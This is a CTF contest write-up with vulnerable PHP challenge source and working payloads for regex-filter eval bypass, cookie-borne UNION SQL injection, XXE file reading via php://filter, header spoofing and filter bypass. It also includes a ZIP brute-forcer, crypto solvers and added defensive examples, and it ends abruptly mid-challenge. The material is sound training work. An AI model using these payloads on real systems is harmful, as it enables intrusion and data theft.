2nd Haixiao Cup (海啸杯) Cybersecurity Challenge Write-up


WEB

1+1=?

  • Description

    A primary-school arithmetic problem.


  • Key points

    • Regex bypass

  • Difficulty

    ★★★★


  • Challenge source

  • index.php

```php
<?php
error_reporting(0);
function get_the_f2ag(){
    echo file_get_contents('flag.php');
}

@$gf = $_GET['s'];
if (!$gf){
    highlight_file(__FILE__);
}

if(strlen($gf)>40){
    die('One inch long, one inch strong!');
}
// Blocks digits, ~ (NOT), ^ (XOR), $, upper-case letters, the lower-case ranges
// m-s, w-z, i-k, b-d and the characters | { } %. The extracted listing shows
// ^, $ and | unescaped, which would make the pattern match every input, so they
// are taken to be the escaped literals the challenge intended.
if(!preg_match('/[0-9]|~|\^|\$|[A-Z|m-s|w-z|i-k|b-d|\||{}|%]/', $gf)){
    eval($gf);
}else{
    die('No!');
}

?>
```

  • waf.php

```php
<?php
error_reporting(0);
if(!preg_match('/eval/', $_GET['s'])&&isset($_GET['s'])){
    foreach (get_defined_functions()['internal'] as $fun) {
        if(preg_match('/'.$fun.'/m', $_GET['s'])){
            die('NO Hacking!');
        }
    }
}
?>
  • .user.ini

```ini
auto_prepend_file=waf.php
```

  • Solution

The first filter (waf.php) blocks the names of most built-in functions, but eval is not blocked; the second filter (the regex in index.php) blocks digits, bitwise NOT, XOR, `$`, upper-case letters, several lower-case ranges and other characters. The goal is to construct the string `get_the_f2ag();` and have eval call it. Since `get_the_f2ag()` contains a digit, the digit has to be built from something else.

`!'a'` evaluates to 0 and `!!'a'` to 1; adding two of them gives 2, which is then concatenated into the string:

'get_the_f'.(!!'a'%2b!!'a').'ag();'

That string has to be evaluated a second time, so the final payload is:

?s=eval('get_the_f'.(!!'a'%2b!!'a').'ag();');

Note that the plus sign must be URL-encoded, because a literal plus in a URL is decoded as a space.

  • flag
flag{i_want_to_have_a_girlfriend_666}

宁静致远 (Tranquility reaches far)

  • Description

    The quieter you become. The more you are able to hear.


  • Key points

    SQL injection through a base64-encoded cookie

  • Difficulty

    • ★★

  • Challenge source

```php
<?php
date_default_timezone_set('Asia/Shanghai');
header("Content-Type:text/html;charset=utf-8");
$server='127.0.0.1';
$username='root';
$passwd='root';
$db='ctf';
$conn = new mysqli($server,$username,$passwd,$db);
if($conn->connect_error<>0){
    die("sql error");
}else{
    $conn->set_charset("utf8")or die("设置字符失败".$conn->error);
}

setcookie("hexo", "MQ==", time()+360);
$user = $_COOKIE['hexo'];
// The cookie is base64-decoded and concatenated straight into the query
$check = base64_decode($user);
$sql = "select * from user where id = '$check'";

$result = $conn->query($sql);
$info = $result->fetch_array(MYSQLI_ASSOC);
echo $info['user'];
?>
```
  • Solution

    • Capturing the request shows an odd cookie parameter, hexo, which is base64-encoded; it decodes to 1, so a UNION-based SQL injection is possible:

    • hexo=-1'union select 1,(select group_concat(flag)from ctf.flag) -- 
    • This is base64-encoded and sent as the cookie value:

    • hexo=LTEndW5pb24gc2VsZWN0IDEsKHNlbGVjdCBncm91cF9jb25jYXQoZmxhZylmcm9tIGN0Zi5mbGFnKSAtLSA=

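As an added example (not from the write-up), the same cookie flow reproduced in Python against an in-memory SQLite database, with the challenge's string-spliced query beside a parameterised one. The schema, the user row and the flag value are constructed placeholders, and the `ctf.` prefix of the write-up's payload is dropped because SQLite has no such database:

```python
import base64
import sqlite3


def make_db():
    # Constructed in-memory schema standing in for the challenge's MySQL database:
    # a user table and a flag table (the flag value is a placeholder)
    conn = sqlite3.connect(":memory:")
    conn.execute("create table user (id integer, user text)")
    conn.execute("insert into user values (1, 'hexo')")
    conn.execute("create table flag (flag text)")
    conn.execute("insert into flag values ('flag{placeholder}')")
    return conn


def decode_cookie(cookie):
    # The application base64-decodes the cookie before using it in SQL
    return base64.b64decode(cookie).decode()


def vulnerable_lookup(conn, cookie):
    # Mirrors the PHP: the decoded cookie is spliced straight into the query text
    check = decode_cookie(cookie)
    sql = "select * from user where id = '%s'" % check
    row = conn.execute(sql).fetchone()
    return row[1] if row else None


def safe_lookup(conn, cookie):
    # Parameterised query: the cookie value is bound as data and never parsed as SQL
    check = decode_cookie(cookie)
    row = conn.execute("select * from user where id = ?", (check,)).fetchone()
    return row[1] if row else None


# The cookie the challenge sets (MQ== is "1") and the write-up's UNION payload
NORMAL_COOKIE = "MQ=="
INJECTED_COOKIE = base64.b64encode(
    b"-1' union select 1,(select group_concat(flag) from flag) -- "
).decode()

if __name__ == "__main__":
    db = make_db()
    print(vulnerable_lookup(db, NORMAL_COOKIE))    # the real user row
    print(vulnerable_lookup(db, INJECTED_COOKIE))  # the flag table leaks
    print(safe_lookup(db, INJECTED_COOKIE))        # nothing matches
```

The base64 layer changes nothing about the injection: decoding happens before the query is built, so the decoded bytes are what the database parser sees. Binding the value as a parameter is the fix, independent of how the cookie was transported.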


Gzmtu学生? (Are you a Gzmtu student?)

  • Description

    Are you a student at Gzmtu?


  • Key points

    • Unauthorised access, IP spoofing

  • Difficulty

    ★


  • Challenge source

```php
<?php
setcookie("user", "0", time()+360);
if(@$_SERVER["HTTP_X_FORWARDED_FOR"]!="127.0.0.1"){
    die("u no student in Gzmtu");
}else{
    if($_COOKIE['user']==1){
     echo "flag{welcom_to_GZMTU_56456s4awdawdafafa}";
    }else{
        die("u no admin!");
    }
}
?>
```
  • Solution

    Spoof the source IP as 127.0.0.1 through the X-Forwarded-For header, then change the cookie to gain unauthorised access and obtain the flag.

  • flag

    flag{welcom_to_GZMTU_56456s4awdawdafafa}
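The challenge trusts X-Forwarded-For as the client address, which any client can set. As an added example (not part of the write-up), this Python function derives the client address the way a server behind a reverse proxy should: the header is honoured only when the TCP peer is a known proxy, and then only its last element, which is the one that proxy appended. The proxy list and the addresses are constructed:

```python
import ipaddress

# Constructed set of reverse proxies that are known to append X-Forwarded-For honestly
TRUSTED_PROXIES = {ipaddress.ip_address("10.0.0.2")}


def client_ip(peer_addr, xff_header):
    """Return the address to use for access decisions.

    peer_addr  - the TCP peer the server actually accepted (not forgeable by the client)
    xff_header - the raw X-Forwarded-For header value, or None
    """
    peer = ipaddress.ip_address(peer_addr)
    if peer not in TRUSTED_PROXIES or not xff_header:
        # Direct connection or no header: the header is client-controlled, ignore it
        return str(peer)
    # A trusted proxy appends the address it saw as the last element; anything
    # before it is whatever the client chose to send and carries no trust
    last_hop = xff_header.split(",")[-1].strip()
    try:
        return str(ipaddress.ip_address(last_hop))
    except ValueError:
        # Malformed header from a trusted proxy: fall back to the peer itself
        return str(peer)


def is_loopback_client(peer_addr, xff_header):
    """The check the challenge meant to make, using the derived address."""
    return client_ip(peer_addr, xff_header) == "127.0.0.1"
```

With this in place a direct connection claiming `X-Forwarded-For: 127.0.0.1` is still identified by its real peer address. The second half of the challenge, a `user` cookie the server itself sets to 0, is likewise client-controlled and cannot serve as an authorisation decision on its own.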

Who are you ?

  • Description

    XXE


  • Key points

    • XXE (XML external entity) injection

  • Difficulty

    ★★


  • Challenge source

```php
<?php
libxml_disable_entity_loader(false);
$data = @file_get_contents('php://input');
$resp = '';
//$flag='flag{79d10626-d27f-4569-a629-c9606d0378f2}';
if($data != false){
  $dom = new DOMDocument();
  // LIBXML_NOENT substitutes entities, so a SYSTEM entity declared in the DTD is resolved
  $dom->loadXML($data, LIBXML_NOENT);
  ob_start();
  $res  = $dom->textContent;
  $resp = ob_get_contents();
  ob_end_clean();
  if ($res){
      die($res);
  }
}
?>

welcome
</div>


<form method="post" class="form">
    <h1 id="title">请输入姓名</h1>
    <br/>
    <br/>
    <br/>
    <input type="text" class="name entry " id="name" name="name" placeholder="Your Name"/>
</form>
<button class="submit entry" onclick="func()">Submit</button>

<div class="shadow"></div>
```
  • Solution

    XXE external entity injection combined with the php://filter wrapper to read the source:

```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=index.php" >]>

<feedback>
<author>&xxe;</author>
</feedback>
```

  • flag

    flag{79d10626-d27f-4569-a629-c9606d0378f2}
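The root cause is that the parser is told to resolve entities from untrusted input. As an added example (not part of the write-up), a small Python guard that refuses any document carrying a DOCTYPE before parsing it: with no DTD there is nowhere to declare an entity, external or otherwise. The write-up's payload above is embedded as the constructed test input, together with a benign document; the class and function names are this example's own:

```python
import re
import xml.etree.ElementTree as ET

# A DOCTYPE declaration is the only place entity declarations (internal,
# SYSTEM or PUBLIC) can appear, so its presence is the thing to reject.
_DOCTYPE_RE = re.compile(rb"<!DOCTYPE", re.IGNORECASE)


class UnsafeXML(ValueError):
    pass


def parse_untrusted_xml(data):
    """Parse XML from an untrusted source, refusing any document with a DTD."""
    if _DOCTYPE_RE.search(data):
        raise UnsafeXML("DOCTYPE/entity declarations are not accepted")
    return ET.fromstring(data)


def text_content(data):
    """Equivalent of the challenge's textContent, but only for guarded input."""
    root = parse_untrusted_xml(data)
    return "".join(root.itertext())


def accepts(data):
    """True if the document parses under the guard, False if it is rejected."""
    try:
        parse_untrusted_xml(data)
        return True
    except UnsafeXML:
        return False


# Constructed inputs: the write-up's XXE payload and a harmless document
XXE_PAYLOAD = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=index.php" >]>
<feedback><author>&xxe;</author></feedback>"""

BENIGN = b"<feedback><author>alice</author></feedback>"
```

The byte-level check runs before any parser sees the input, so it cannot be bypassed by parser options. It is deliberately blunt: a comment or CDATA section that happens to contain the text `<!DOCTYPE` is rejected too, which is an acceptable trade for an endpoint that only ever expects a plain feedback element.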

EasyWeb

  • Description

    EasyWeb


  • Key points

    • Double bypass

  • Difficulty

    ★★


  • Challenge source

```php
<?php
//flag in flag.php
@$payload = $_GET['s'];
if(!isset($_GET['s'])){
    highlight_file(__FILE__);
    die();
}
$payload=str_replace(['php','flag'], '', $payload);
if(!empty($payload)&&preg_match('/flag/', @$_GET['x'])==md5(@$_GET['x'])&&!empty($_GET['x']))
    echo file_get_contents($payload);

?>
```
  • Solution

```
index.php?s=flaflagg.phflagp&x[]=1
```

  • flag

flag{Hello_Gzmtu_66666666666}
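Why the `s` half of the payload works: `str_replace` removes each token once, so a string built so that removing the inner token reassembles the outer one survives the filter. As an added example (not from the write-up), the single-pass removal in Python beside two alternatives: repeating the removal until nothing changes, and the approach that actually closes the hole, an allowlist of file names resolved inside a fixed directory. The directory and the allowlist are constructed:

```python
import os

ALLOWED_DIR = "/var/www/public"            # assumed document root
ALLOWED_FILES = {"about.txt", "help.txt"}  # assumed allowlist of readable files


def denylist_strip(path):
    """The challenge's check: remove 'php' and 'flag' once each.

    "flaflagg.phflagp" collapses to "flag.php" because deleting the inner
    token rebuilds the outer one.
    """
    return path.replace("php", "").replace("flag", "")


def denylist_strip_fixpoint(path):
    """Repeat the removal until the string stops changing.

    This closes the reassembly trick, but a denylist still admits every file
    it did not think of, so it is not the fix.
    """
    while True:
        new = path.replace("php", "").replace("flag", "")
        if new == path:
            return new
        path = new


def resolve_allowed(path):
    """Allowlist: accept only a known basename and resolve it under ALLOWED_DIR."""
    name = os.path.basename(path)
    if name not in ALLOWED_FILES:
        return None
    full = os.path.normpath(os.path.join(ALLOWED_DIR, name))
    # Defence in depth: the resolved path must still sit inside the directory
    return full if full.startswith(ALLOWED_DIR + os.sep) else None
```

The `x[]=1` half is a separate weakness: handing an array to `preg_match` and `md5` makes both fail, and the loose `==` between their failure values passes. Strict comparison and type checks on `$_GET['x']` would remove that, but the file read is only safe once the path is chosen from a fixed set rather than filtered.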

MISC

签到题 (Sign-in)

  • Description

    this is a pic.


  • Key points

    • base64 encoding and decoding

  • Difficulty

    ☆


  • Challenge source

    A text file containing the base64 encoding of a PNG image.
  • Solution

    Base64-decode the text and save the result as a PNG image; the flag is in the picture.

```python
import base64

# Read the base64 text from the challenge file
with open('flag.txt', 'r') as f:
    s = f.read()

# Write the decoded bytes in binary mode; wrapping b64decode() in str() and
# writing in text mode would store the literal text "b'...'" instead of the image
with open('flag.png', 'wb') as f2:
    f2.write(base64.b64decode(s))
```
  • flag

    flag{I_LOVE_CHINA}

小明的求助 (Xiaoming's plea)

  • Description

    Xiaoming's girlfriend sent him an important file as a compressed archive. The archive was corrupted during transfer, and all he knows about the password is that it is "hlqiou" followed by four digits. If he cannot open the file, his girlfriend will leave him. Can you help him?


  • Key points

    • File header repair
    • Security scripting

  • Difficulty

    ★★

  • Solution

    The file header is damaged; repair it so that it is a valid ZIP header.

    Then write a script that brute-forces the archive password by attempting extraction:

```python
# -*- coding: utf-8 -*-
import zipfile


def main():
    # Open the archive (its header has already been repaired by hand)
    with zipfile.ZipFile('test/xiaoming.zip') as zFile:
        # The password is "hlqiou" followed by four digits, so try 0000..9999
        # (the original loop started at 1000 and stopped before 9999)
        for i in range(10000):
            password = "hlqiou%04d" % i
            try:
                zFile.extractall(path='./test/flag', pwd=password.encode("utf8"))
                print(password)
                break  # stop at the first password that extracts cleanly
            except Exception:
                pass


if __name__ == '__main__':
    main()
```
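The header repair step is done by hand in the write-up. As an added example (not the write-up's code), a Python version that checks which ZIP structures are present before rewriting anything: the first local-file-header signature is restored only when a central directory and an end-of-central-directory record are still there, so a file that is not a damaged ZIP at all is not silently turned into garbage. The sample archive is constructed in memory and the damage is simulated by zeroing its first four bytes:

```python
import io
import zipfile

LOCAL_HEADER_SIG = b"PK\x03\x04"
CENTRAL_DIR_SIG = b"PK\x01\x02"
EOCD_SIG = b"PK\x05\x06"


def diagnose_zip(data):
    """Report which ZIP structures are present and whether the first header is intact."""
    return {
        "local_header_ok": data[:4] == LOCAL_HEADER_SIG,
        "has_central_dir": CENTRAL_DIR_SIG in data,
        "has_eocd": data.rfind(EOCD_SIG) != -1,
    }


def repair_zip_header(data):
    """Restore a damaged first local-file-header signature.

    Only the 4-byte magic is rewritten. Without a central directory and an EOCD
    record the file is not a ZIP whose header was merely corrupted, and guessing
    would only hide that.
    """
    d = diagnose_zip(data)
    if d["local_header_ok"]:
        return data
    if not (d["has_central_dir"] and d["has_eocd"]):
        raise ValueError("no central directory/EOCD: not a repairable ZIP")
    return LOCAL_HEADER_SIG + data[4:]


def build_corrupted_sample():
    """Constructed sample: a real ZIP whose first four bytes were overwritten."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("important.txt", "constructed sample content")
    data = buf.getvalue()
    return b"\x00\x00\x00\x00" + data[4:]


def read_first_member(data):
    """Content of the first entry, or None if the local header is rejected.

    zipfile lists names from the central directory, so namelist() still works on
    the damaged file; reading a member is what touches the broken local header.
    """
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        try:
            return z.read(z.namelist()[0])
        except zipfile.BadZipFile:
            return None
```

After `repair_zip_header` the brute-force script above can open the archive; a file whose central directory is also gone needs a different recovery than a four-byte patch.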
  • flag
flag{5oiR54ix6buE6I6J6I2D}

老烟枪 (Old chain-smoker)

  • Description

    老烟枪


  • Key points

    • Image steganography

  • Difficulty

    ★


  • Solution

Extract the embedded file with binwalk, or separate it by hand:

```shell
binwalk -e 666.jpg
```
  • flag
flag{WW91IGxvb2sgc2VyaW91cywgbGlrZSBDYWkgWHVrdW4u}
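What binwalk does for the "separate by hand" route is scan for file signatures and cut at the second one. As an added example (not the write-up's code), a minimal Python carver that knows three magics, reports every hit with its offset, and splits the cover image from whatever is appended after it. The sample is constructed: a fake JPEG header and body with a real ZIP appended, so only the ZIP half is a genuine file:

```python
import io
import zipfile

# Magic numbers for the formats this scanner knows about (a small assumed subset)
SIGNATURES = {
    b"\xff\xd8\xff": "jpeg",
    b"\x89PNG\r\n\x1a\n": "png",
    b"PK\x03\x04": "zip",
}


def scan_signatures(data):
    """Return (offset, type) for every known signature in data, lowest offset first."""
    hits = []
    for magic, kind in SIGNATURES.items():
        start = 0
        while True:
            idx = data.find(magic, start)
            if idx == -1:
                break
            hits.append((idx, kind))
            start = idx + 1
    return sorted(hits)


def carve_trailing(data):
    """Split a file into its leading image and the data appended after it.

    The first signature belongs to the cover file; the next signature at a
    higher offset is treated as the start of the embedded payload.
    """
    hits = scan_signatures(data)
    if len(hits) < 2:
        return data, b""
    split = hits[1][0]
    return data[:split], data[split:]


def build_sample():
    """Constructed sample: a fake JPEG (header, padding, end marker) with a ZIP appended."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        # Fixed timestamp so the sample bytes are identical on every run
        z.writestr(zipfile.ZipInfo("hidden.txt", (2020, 1, 1, 0, 0, 0)), "constructed hidden content")
    cover = b"\xff\xd8\xff\xe0" + b"\x00" * 64 + b"\xff\xd9"
    return cover + buf.getvalue()


def hidden_names(data):
    """Names inside the carved-out archive."""
    _, payload = carve_trailing(data)
    with zipfile.ZipFile(io.BytesIO(payload)) as z:
        return z.namelist()
```

Real carvers also validate the candidate (for a ZIP, that a central directory follows) because magic bytes occur by chance inside compressed data; for a file that is simply an image with an archive glued to the end, the offset of the second signature is all that is needed.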

抓黑客 (Catch the hacker)

  • Description

    A school server was compromised. The administrator preserved the server logs in time. The attacker is known to have added a user with root privileges; audit the logs to find the username, time and IP of that user's first login. Flag format:

    username+time+ip

    for example: xiaoming+12:00+127.0.0.1


  • Key points

    • Log auditing

  • Difficulty

    ★


  • Solution

Searching for "Accepted " directly lists the successful logins with their user and source address:

```shell
grep "Accepted " auth.log | awk '{print $1,$2,$3,$9,$11}'
```

  • flag

    mysq1+10:34:30+172.16.5.143
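The grep/awk one-liner above relies on the field positions of sshd's "Accepted" line. As an added example (not the write-up's code), the same audit in Python over a handful of constructed auth.log lines: the parser pulls user, time and IP out of every accepted login, keeps the first login per account, and flags account names that differ from a well-known service or admin name by a single character, which is how the planted `mysq1` stands out next to `mysql`. The log lines are made up; only the user, time and IP of the answer echo the write-up:

```python
import re
from collections import OrderedDict

# Constructed sample in the syslog format auth.log uses
SAMPLE_AUTH_LOG = """\
Jan 12 10:12:01 srv sshd[2001]: Failed password for root from 172.16.5.143 port 40122 ssh2
Jan 12 10:33:58 srv sshd[2077]: Accepted password for admin from 10.10.1.5 port 51000 ssh2
Jan 12 10:34:30 srv sshd[2090]: Accepted password for mysq1 from 172.16.5.143 port 40210 ssh2
Jan 12 11:02:14 srv sshd[2150]: Accepted publickey for mysq1 from 172.16.5.143 port 40333 ssh2
"""

# month day time host sshd[pid]: Accepted <method> for <user> from <ip> port ...
LINE_RE = re.compile(
    r"^(?P<month>\w{3})\s+(?P<day>\d+)\s+(?P<time>[\d:]+)\s+\S+\s+sshd\[\d+\]:\s+"
    r"Accepted (?P<method>\w+) for (?P<user>\S+) from (?P<ip>\S+) port"
)


def successful_logins(log_text):
    """Yield (user, time, ip) for every accepted sshd login, in file order."""
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:
            yield m.group("user"), m.group("time"), m.group("ip")


def first_login_per_user(log_text):
    """Map each user to the (time, ip) of their earliest accepted login."""
    first = OrderedDict()
    for user, when, ip in successful_logins(log_text):
        first.setdefault(user, (when, ip))
    return first


def lookalike_users(users, legit=("mysql", "root", "admin")):
    """Return (user, legit_name) pairs where the user name is one character
    away from a known service/admin name, e.g. a digit 1 standing in for l."""
    flagged = []
    for u in users:
        for name in legit:
            if u != name and len(u) == len(name) and sum(a != b for a, b in zip(u, name)) == 1:
                flagged.append((u, name))
    return flagged


def answer(log_text):
    """Format user+time+ip for the first login of the first lookalike account found."""
    first = first_login_per_user(log_text)
    for user, _legit in lookalike_users(first):
        when, ip = first[user]
        return "%s+%s+%s" % (user, when, ip)
    return None
```

The homoglyph heuristic is only a triage aid; in a real incident the list of accounts to check comes from the evidence (here, the administrator's statement that a root-level user was added, which /etc/passwd or useradd entries in the same logs would confirm).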

表白 (Confession)

  • Description

    Xiaoming's crush sent him a file, but he does not know how to open it. Can you help him?

  • Key points

    - ZIP pseudo-encryption
    - Hidden PNG height

  • Difficulty

    ★★☆

  • Solution

    Remove the pseudo-encryption, then brute-force the image height.
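Both steps can be done in a few lines once the file formats are understood. As an added example (not the write-up's code), Python for the two techniques the solution names: recovering a PNG's true height by trying values until the IHDR CRC matches the one stored in the file, and clearing the "encrypted" flag that pseudo-encryption sets on entries that were never encrypted. The PNG and the ZIP are constructed in memory so the example runs offline; the damage (a shortened height, a set flag bit) is applied to them the same way the challenge file would have been prepared:

```python
import io
import struct
import zipfile
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"


def _chunk(kind, body):
    return struct.pack(">I", len(body)) + kind + body + struct.pack(">I", zlib.crc32(kind + body))


def build_png(width, height):
    """Constructed minimal 8-bit greyscale PNG: `height` all-zero rows of `width` pixels."""
    raw = b"".join(b"\x00" + b"\x00" * width for _ in range(height))
    ihdr = struct.pack(">IIBBBBB", width, height, 8, 0, 0, 0, 0)
    return PNG_SIG + _chunk(b"IHDR", ihdr) + _chunk(b"IDAT", zlib.compress(raw)) + _chunk(b"IEND", b"")


def set_height(png, height):
    """Overwrite the IHDR height and leave the stored CRC alone, which is what
    hiding the bottom of a picture does (and why the CRC gives it away)."""
    return png[:20] + struct.pack(">I", height) + png[24:]


def ihdr_crc_ok(png):
    # IHDR sits at a fixed position: type at 12..16, 13-byte body at 16..29, CRC at 29..33
    return zlib.crc32(png[12:29]) == struct.unpack(">I", png[29:33])[0]


def recover_height(png, max_height=10000):
    """Brute-force the height whose IHDR CRC equals the stored CRC, or None."""
    stored = struct.unpack(">I", png[29:33])[0]
    head, tail = png[12:20], png[24:29]
    for h in range(1, max_height + 1):
        if zlib.crc32(head + struct.pack(">I", h) + tail) == stored:
            return h
    return None


LOCAL_SIG = b"PK\x03\x04"
CENTRAL_SIG = b"PK\x01\x02"


def _set_encrypted_flag(data, on):
    # Bit 0 of the general-purpose flag: offset 6 in a local header, 8 in a central entry
    buf = bytearray(data)
    for sig, off in ((LOCAL_SIG, 6), (CENTRAL_SIG, 8)):
        pos = buf.find(sig)
        while pos != -1:
            buf[pos + off] = (buf[pos + off] | 1) if on else (buf[pos + off] & 0xFE)
            pos = buf.find(sig, pos + 1)
    return bytes(buf)


def clear_pseudo_encryption(data):
    """Clear the encrypted flag on entries that were never actually encrypted."""
    return _set_encrypted_flag(data, False)


def build_pseudo_encrypted_zip():
    """Constructed sample: a plain stored ZIP with only the encrypted flag set."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr(zipfile.ZipInfo("secret.txt", (2020, 1, 1, 0, 0, 0)), "constructed content")
    return _set_encrypted_flag(buf.getvalue(), True)


def first_member(data):
    """Content of the first entry, or None if zipfile refuses it as encrypted."""
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        try:
            return z.read(z.namelist()[0])
        except RuntimeError:
            return None
```

Telling pseudo-encryption from real encryption is the important check before clearing flags: when the flag is set on some entries and not others, or the central directory and local header disagree, the flag is the lie; when every entry is flagged and its data does not inflate, it is real and no flag edit will help.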

Reverse

Baby reverse

  • Description
  • Key points

    - IDA basics

  • Difficulty

    ☆


  • Solution

Use IDA's string search to find the flag.

  • flag

flag{reverse_is_easy}

Easy reverse

  • Description

    Simple arithmetic

  • Key points

    - Using IDA's decompiler
    • Reversing a simple algorithm

  • Difficulty


  • Solution

The core algorithm XORs each character of the input with 0xC and then adds 1.

Decryption script (undo the steps in reverse order):

```python
key = "kanlxvdzTljyTfyTeuor"
flag = ""
for i in key:
    # subtract the 1 first, then undo the XOR with 0xC
    flag += chr((ord(i) - 1) ^ 0xC)
print(flag)
```

霸王别姬 (Farewell My Concubine)

  • Description

    Xiaoming wants to cook a soft-shell turtle and black-bone chicken soup, but does not know how to remove the shell (a pun: 脱壳 also means unpacking).

  • Key points

    - Unpacking

  • Difficulty

    ★★

  • Solution

After packing, the file's functions and logic are hidden.

Key point: recognise UPX packing and remove it, either by hand or with a tool.

Method 1: unpack with a tool

Once unpacked, the flag is visible.

Method 2: the ESP law

Load the file in OllyDbg (OD).

Step until ESP changes abruptly.

Right-click ESP and choose Follow in Dump.

Select the first item in the dump window, right-click it, set a hardware breakpoint on access, and run.

Execution stops at a large jump; that is the jump to the OEP.

Use OD's built-in plugin to dump the unpacked file.

Load the dumped file into IDA. Although UPX was not stripped cleanly, the program's main function and the hidden flag can be seen.


电竞选手 (Esports player)

  • Description

    I hear CTF players often use WASD?

  • Key points

    - Reversing

  • Difficulty

    ★★★★

  • Solution

Load the program in IDA and inspect its logic.

The key check: when both functions return 1, the input is the flag. First, sub_401350:

Then sub_40145A:

The maze:

```
##....####
##.##.###.
##.##.###.
...##.###.
.####.....
.####.#.##
.####...##
....######
###.###+##
###.....##
```

Walking through the maze to the + position gives the flag.
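The path can be found by hand, but a breadth-first search over the grid gives the shortest WASD sequence and generalises to any maze of this shape. As an added example (not the write-up's code), a Python solver over the maze above. The write-up does not state where the player starts; the solver defaults to the first open cell in reading order (row 0, column 2), which is an assumption, and the mapping of W/S/A/D to up/down/left/right is the one the challenge title suggests:

```python
from collections import deque

# Maze copied from the write-up: '#' is a wall, '.' is open, '+' is the goal
MAZE = [
    "##....####",
    "##.##.###.",
    "##.##.###.",
    "...##.###.",
    ".####.....",
    ".####.#.##",
    ".####...##",
    "....######",
    "###.###+##",
    "###.....##",
]

# Assumed key mapping: W up, S down, A left, D right (row delta, column delta)
MOVES = {"W": (-1, 0), "S": (1, 0), "A": (0, -1), "D": (0, 1)}


def find(maze, ch):
    """Position of the first occurrence of ch in reading order, or None."""
    for r, row in enumerate(maze):
        c = row.find(ch)
        if c != -1:
            return r, c
    return None


def solve(maze, start=None):
    """Shortest key sequence from start to '+' (BFS), or None if unreachable."""
    if start is None:
        start = find(maze, ".")  # assumption: the first open cell is the entrance
    goal = find(maze, "+")
    rows, cols = len(maze), len(maze[0])
    prev = {start: None}  # cell -> (previous cell, key pressed to get here)
    queue = deque([start])
    while queue:
        cur = queue.popleft()
        if cur == goal:
            break
        r, c = cur
        for key, (dr, dc) in MOVES.items():
            nxt = (r + dr, c + dc)
            if (0 <= nxt[0] < rows and 0 <= nxt[1] < cols
                    and maze[nxt[0]][nxt[1]] != "#" and nxt not in prev):
                prev[nxt] = (cur, key)
                queue.append(nxt)
    if goal not in prev:
        return None
    keys = []
    node = goal
    while prev[node] is not None:
        node, key = prev[node]
        keys.append(key)
    return "".join(reversed(keys))


if __name__ == "__main__":
    print(solve(MAZE))
```

For this maze the corridor down the left edge is the only way to the bottom rows, so the shortest path is also the only one; if the binary expects a different start cell, pass it as `start=(row, col)`.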



Cryptography

恺撒将军 (General Caesar)

  • Description

    General Caesar used a certain technique to command his soldiers from afar and win battles a thousand miles away.

    The enemy intercepted this ciphertext: ]p{k]6wmfqozgJ<id[QidKkl[6Qy[5YEf6nziT@@

    offset: 3

  • Key points

    - Caesar cipher
    - base64 decoding

  • Difficulty

    ★★

  • Solution

    Encryption: the flag is base64-encoded and every character of the result is shifted forward by 3 (the order the encryption script below uses).

    Encryption script:

```python
import base64

flag = "flag{crypto_is_hxb_so_eAsy0}"

# Step 1: base64-encode the flag
result = base64.b64encode(flag.encode()).decode()
print(result)

# Step 2: shift every character forward by 3 (mod 128)
encode_flag = ""
for i in result:
    encode_flag += chr((ord(i) + 3) % 128)

print(encode_flag)
```

    Decryption script:

```python
import base64

result = "]p{k]6wmfqozgJ<id[QidKkl[6Qy[5YEf6nziT@@"

# Undo the shift, then base64-decode
flag = ""
for i in result:
    flag += chr(ord(i) - 3)

print(base64.b64decode(flag).decode())
```

小明家的小菜园 (Xiaoming's vegetable garden)

  • Description

    Xiaoming's family is building a fence around their vegetable garden. He asked his beloved crush for advice and she gave him only this hint, which he cannot make sense of. Can you help him?:

    f_tnluz_aghggeao{t_oy_ldoia}

  • Key points

    - Rail-fence cipher

  • Difficulty

    ★★

  • Solution

    Because the number of rails is small, no rail count is given; use an online rail-fence decoder or write a script that brute-forces the rail count.

    Encryption script:

```python
flag = "flag{yo_uget_itzha_lan_good}"

# The 28-character flag is written as 4 rows of 7 characters:
#   flag{yo
#   _uget_i
#   tzha_la
#   n_good}
# and read out column by column, so the first column gives "f_tn"
k = 7

encode_flag = ""
for i in range(7):
    for j in range(4):
        encode_flag += flag[j * 7 + i]

print(encode_flag)
```

    Decryption script:

```python
encode_flag = "f_tnluz_aghggeao{t_oy_ldoia}"

# Try every column count k; the rail count that goes with it is 28 // k
for k in range(1, 29):
    flag = ""
    num = 28 // k
    for i in range(k):
        for j in range(num):
            flag += encode_flag[j * k + i]
    if "flag" in flag:
        print("k:" + str(28 // k) + "\n" + "flag:\n" + flag + "\n")
```

战报 (Battle report)

  • Description:

    Our army destroyed an enemy secret radio station and seized a ciphertext together with its plaintext, but another ciphertext remains unbroken. You are asked to break the cipher:

Ciphertext:
